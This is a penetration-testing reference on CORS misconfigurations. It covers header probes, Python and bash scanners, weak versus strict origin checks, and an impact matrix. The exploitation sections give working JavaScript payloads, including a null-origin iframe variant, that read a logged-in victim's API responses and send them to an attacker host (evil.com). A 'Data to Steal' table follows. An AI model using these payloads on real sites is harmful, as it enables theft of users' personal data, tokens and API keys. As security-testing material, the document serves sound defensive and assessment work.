Overview

Cross-Origin Resource Sharing (CORS) is the browser mechanism that lets a server relax the same-origin policy and state which origins may read its responses. When those headers are misconfigured, JavaScript on an attacker's site can issue requests that carry the victim's session cookies and read the authenticated responses that come back.

Key Headers

| Header | Description |
| --- | --- |
| Access-Control-Allow-Origin | The single origin (or `*`, or `null`) allowed to read the response; partial wildcards such as *.example.com are not valid values |
| Access-Control-Allow-Credentials | `true` lets a request sent with cookies or HTTP auth read the response; browsers refuse it together with `*` |
| Access-Control-Allow-Methods | Methods permitted in a preflighted request |
| Access-Control-Allow-Headers | Request headers permitted in a preflighted request |
| Access-Control-Expose-Headers | Response headers JS may read beyond the CORS-safelisted ones |
| Access-Control-Max-Age | Seconds a preflight result may be cached |

Because Access-Control-Allow-Origin carries one value, a server that trusts several origins has to echo the validated one; when it does, it should also send Vary: Origin so a shared cache never hands one origin's response to another.

Detection

Check Headers

curl -s -D - -o /dev/null -H "Origin: https://evil.com" https://TARGET/api/user
Look for:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Send a GET and dump the headers (-D -) rather than curl -I: -I issues HEAD, which some frameworks route to a different handler that never adds CORS headers. If the endpoint only emits them on authenticated responses, add -b with a valid session cookie. Your origin reflected together with Allow-Credentials: true is the exploitable pattern; confirm it on an endpoint that actually returns session-bound data before calling it a finding.

Variations to Test

# Reflected origin
curl -s -D - -o /dev/null -H "Origin: https://evil.com" TARGET

# Null origin
curl -s -D - -o /dev/null -H "Origin: null" TARGET

# Subdomain (tests a *.TARGET policy)
curl -s -D - -o /dev/null -H "Origin: https://sub.TARGET" TARGET

# Prefix match: server checks startsWith/contains TARGET, attacker registers TARGET.evil.com
curl -s -D - -o /dev/null -H "Origin: https://TARGET.evil.com" TARGET

# Suffix match: server checks endsWith TARGET without a leading dot, attacker registers evilTARGET
curl -s -D - -o /dev/null -H "Origin: https://evilTARGET" TARGET

# Scheme downgrade: the http origin of the same host (exploitable from a MITM or XSS on the http site)
curl -s -D - -o /dev/null -H "Origin: http://TARGET" TARGET
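The probe loop above, turned into a small harness. This is an added example, not the page's own tooling and not Corsy: it builds the same Origin variations for a target, sends each one with a GET, and classifies the response headers. The transport is injectable so the classifier can be exercised offline against constructed responses; the target https://example.com/api/user and the attacker domain evil.com are hypothetical placeholders.

```python
"""Probe a target with every Origin variation above and classify each answer.

Added example (not the page's own tooling or Corsy). The transport is
injectable so the classifier runs offline against constructed responses;
the target https://example.com/api/user and attacker domain evil.com are
hypothetical placeholders.
"""
import urllib.error
import urllib.request
from urllib.parse import urlsplit

ATTACKER = "evil.com"  # assumed attacker-controlled domain


def build_probes(target_url):
    """Origin values to send, keyed by the server-side bug each one exposes."""
    host = urlsplit(target_url).hostname
    return {
        "reflect":   f"https://{ATTACKER}",         # any origin reflected?
        "null":      "null",                        # sandboxed iframe / data: URI
        "subdomain": f"https://attacker.{host}",    # *.host policy (XSS/takeover path)
        "prefix":    f"https://{host}.{ATTACKER}",  # startsWith/contains check
        "suffix":    f"https://evil{host}",         # endsWith check without leading dot
        "http":      f"http://{host}",              # scheme downgrade
    }


def classify(sent_origin, headers):
    """Verdict for one probe from its response headers (case-insensitive)."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # Browsers refuse '*' together with credentials, so authenticated
        # data is not readable whatever the credentials header says.
        return "wildcard"
    if acao == sent_origin:
        # Only the credentialed variant lets evil.com read the victim's session data.
        return "reflected+credentials" if creds else "reflected"
    return "fixed:" + acao


def fetch_headers(url, origin):
    """Default transport: a real GET (not HEAD) carrying the Origin header.

    4xx/5xx responses are kept because CORS headers are often emitted on
    them too (e.g. a 401 from an endpoint that needs a session cookie).
    """
    req = urllib.request.Request(url, headers={"Origin": origin}, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return dict(resp.headers.items())
    except urllib.error.HTTPError as err:
        return dict(err.headers.items())


def scan(target_url, transport=fetch_headers):
    """Run every probe; returns {name: (origin_sent, verdict)}."""
    results = {}
    for name, origin in build_probes(target_url).items():
        try:
            verdict = classify(origin, transport(target_url, origin))
        except OSError as exc:  # DNS/connect/timeout failures (URLError is an OSError)
            verdict = f"error:{exc.__class__.__name__}"
        results[name] = (origin, verdict)
    return results


def fake_transport(url, origin):
    """Constructed responses: a server that reflects any https or null Origin
    with credentials and answers everything else with '*'."""
    if origin == "null" or origin.startswith("https://"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {"Access-Control-Allow-Origin": "*"}


if __name__ == "__main__":
    # Swap fake_transport for fetch_headers to run against a live target.
    for name, (origin, verdict) in scan("https://example.com/api/user",
                                        fake_transport).items():
        flag = "[VULN]" if verdict == "reflected+credentials" else "      "
        print(f"{flag} {name:<9} {origin:<32} -> {verdict}")
```

Pass fetch_headers (the default) instead of fake_transport to run the probes for real. A "reflected" verdict without credentials is worth noting but is not a data-theft finding; "wildcard" is never one.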

Vulnerable Configurations

1. Origin Reflection

Server reflects any Origin header back.
Request:  Origin: https://evil.com
Response: Access-Control-Allow-Origin: https://evil.com
          Access-Control-Allow-Credentials: true

2. Null Origin Allowed

Request:  Origin: null
Response: Access-Control-Allow-Origin: null
          Access-Control-Allow-Credentials: true
A null Origin is sent by sandboxed iframes without allow-same-origin, pages opened from data: URIs or local files, and requests that followed a cross-origin redirect. Allowing it with credentials is as bad as reflecting any origin, since the attacker needs nothing more than a sandboxed iframe.

3. Weak Origin Check

The server validates the Origin with a substring, prefix, suffix or loosely written regex match instead of an exact allowlist. Each of these origins is a domain the attacker can register:
https://TARGET.evil.com   → Allowed by startsWith("https://TARGET") or contains("TARGET")
https://evilTARGET        → Allowed by endsWith("TARGET") when the check omits the leading dot
Unescaped dot in a regex → "." matches any character, so a lookalike with another character in that position passes

4. Wildcard with Credentials

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Browsers refuse to expose a credentialed response when the allowed origin is *, so this pair on its own leaks nothing. The dangerous variant is a framework "allow any origin" setting that, once credentials are enabled, reflects the request's Origin instead of sending *; that is case 1 and should be tested as such.

5. Pre-Domain Wildcard

*.TARGET.com → Any subdomain allowed
Access-Control-Allow-Origin has no partial wildcards, so a *.TARGET.com policy is implemented server-side by matching the Origin's host and reflecting it. Every subdomain becomes a trusted client: an XSS on any of them, or a takeover of a dangling one, reads the API with the victim's session.
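To make cases 3 and 5 concrete, the following added example (not code from the page) puts the weak server-side origin checks next to a strict one and runs the attacker origins from above through each. The site example.com, the allowlist and the *.example.com policy are hypothetical; the `matrix()` function reports which attacker origins each check lets through.

```python
"""Weak Origin checks from cases 3 and 5 beside a strict one (added example,
not code from the page). The site example.com, the allowlist and the
*.example.com policy are hypothetical.
"""
import re
from urllib.parse import urlsplit

SITE = "example.com"
ALLOWED = {"https://app.example.com", "https://www.example.com"}


# --- Weak checks: each passes an origin the attacker can register ----------

def weak_contains(origin):
    # contains: "https://example.com.evil.com" and "https://evilexample.com" pass
    return SITE in origin


def weak_startswith(origin):
    # prefix: "https://example.com.evil.com" passes
    return origin.startswith("https://" + SITE)


def weak_endswith(origin):
    # suffix without the leading dot: "https://evilexample.com" passes
    return origin.endswith(SITE)


def weak_regex(origin):
    # unescaped '.': any character matches it, so "https://examplexcom" passes
    return re.match(r"^https://([a-z0-9-]+\.)*example.com$", origin) is not None


# --- Strict checks --------------------------------------------------------

def strict_allowlist(origin):
    """Exact match against a fixed set; the only safe shape when credentials are on."""
    return origin in ALLOWED


def strict_subdomain(origin):
    """If *.example.com must be trusted: parse the Origin, require https and
    compare the hostname suffix with its leading dot. Every subdomain, and
    any XSS or takeover on it, is still in scope (case 5)."""
    try:
        parts = urlsplit(origin)
    except ValueError:
        return False
    host = parts.hostname
    if parts.scheme != "https" or host is None or parts.path:
        return False
    return host == SITE or host.endswith("." + SITE)


def cors_headers(origin, check):
    """Headers the server should emit: reflect only a validated origin and
    add Vary: Origin so a shared cache never serves one origin's answer to another."""
    if not check(origin):
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


# Constructed attacker origins, one per weakness above plus downgrade and null.
ATTACKER_ORIGINS = [
    "https://example.com.evil.com",
    "https://evilexample.com",
    "https://examplexcom",
    "http://app.example.com",   # scheme downgrade
    "null",
]
CHECKS = [weak_contains, weak_startswith, weak_endswith, weak_regex,
          strict_allowlist, strict_subdomain]


def matrix():
    """{check name: [attacker origins it wrongly lets through]}"""
    return {c.__name__: [o for o in ATTACKER_ORIGINS if c(o)] for c in CHECKS}


if __name__ == "__main__":
    for name, passed in matrix().items():
        print(f"{name:<18} allows: {passed or 'none'}")
```

The strict functions never return headers for an attacker origin, and the allowlist variant is the one to recommend whenever Allow-Credentials is true; strict_subdomain is only acceptable when every subdomain is as well defended as the API itself.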

Exploitation — Origin Reflection

<script>
var req = new XMLHttpRequest();
req.onload = function() {
    // Readable only because the server reflected our Origin with Allow-Credentials: true
    // Send victim's data to attacker
    fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
};
req.open('GET', 'https://TARGET/api/user', true);
req.withCredentials = true;   // attach the victim's TARGET cookies to the cross-origin request
req.send();
</script>
Host on https://evil.com; when a logged-in victim visits, the browser attaches their TARGET cookies (withCredentials) and the reflected Access-Control-Allow-Origin lets the script read the response. One caveat: under the SameSite=Lax default that Chromium-based browsers apply to cookies lacking a SameSite attribute, the session cookie is not sent on this cross-site request unless it was set with SameSite=None; Secure, so check the cookie's attributes before rating the impact.

Exploitation — Null Origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
  src="data:text/html,<script>
    var req = new XMLHttpRequest();
    req.onload = function() {
      fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
    };
    req.open('GET', 'https://TARGET/api/user', true);
    req.withCredentials = true;
    req.send();
  </script>">
</iframe>
The sandbox attribute without allow-same-origin puts the frame in an opaque origin, so its requests carry Origin: null. The same payload works from a data: URI opened directly or from a local file, and the same caveat about SameSite cookies applies.

Exploitation — Subdomain Takeover + CORS

If *.TARGET.com is allowed and an unused subdomain exists:
  1. Take over unused.TARGET.com (dangling CNAME, cloud service)
  2. Host exploit on unused.TARGET.com
  3. CORS allows it → read authenticated responses

Data to Steal

| Endpoint | Data |
| --- | --- |
| /api/user | PII, email, role |
| /api/account | Account details, API keys |
| /api/settings | Config, tokens |
| /api/admin | Admin data |
| /api/keys | API keys, secrets |

Automation

Nuclei

nuclei -t http/vulnerabilities/cors/ -l urls.txt
# or select every CORS template by tag
nuclei -tags cors -l urls.txt

Manual Script

#!/usr/bin/env bash
# One GET per URL (not HEAD); headers dumped to stdout, body discarded.
while read -r url; do
    hdrs=$(curl -s -m 10 -D - -o /dev/null -H "Origin: https://evil.com" "$url")
    origin=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-origin:')
    creds=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-credentials:')
    if [[ "$origin" == *"https://evil.com"* ]] && printf '%s' "$creds" | grep -qi true; then
        echo "[VULN] $url"
    fi
done < urls.txt

Corsy

# https://github.com/s0md3v/Corsy
python3 corsy.py -u https://TARGET
python3 corsy.py -i urls.txt -t 20

Impact Matrix

| Config | Credentials | Impact |
| --- | --- | --- |
| Reflected origin | true | Critical: full read of authenticated responses |
| Null allowed | true | High: exploitable from a sandboxed iframe or data: URI |
| Weak origin check | true | High: register a lookalike domain that passes the check |
| Wildcard * | false | Low: only responses that were already public |
| Subdomain wildcard | true | Medium: needs XSS on, or takeover of, a subdomain |

Quick Reference

| Test | Command |
| --- | --- |
| Check reflection | curl -s -D - -o /dev/null -H "Origin: https://evil.com" TARGET |
| Check null | curl -s -D - -o /dev/null -H "Origin: null" TARGET |
| Exploit | Host JS that reads /api/user with withCredentials = true |
| Tool | corsy.py -u TARGET |
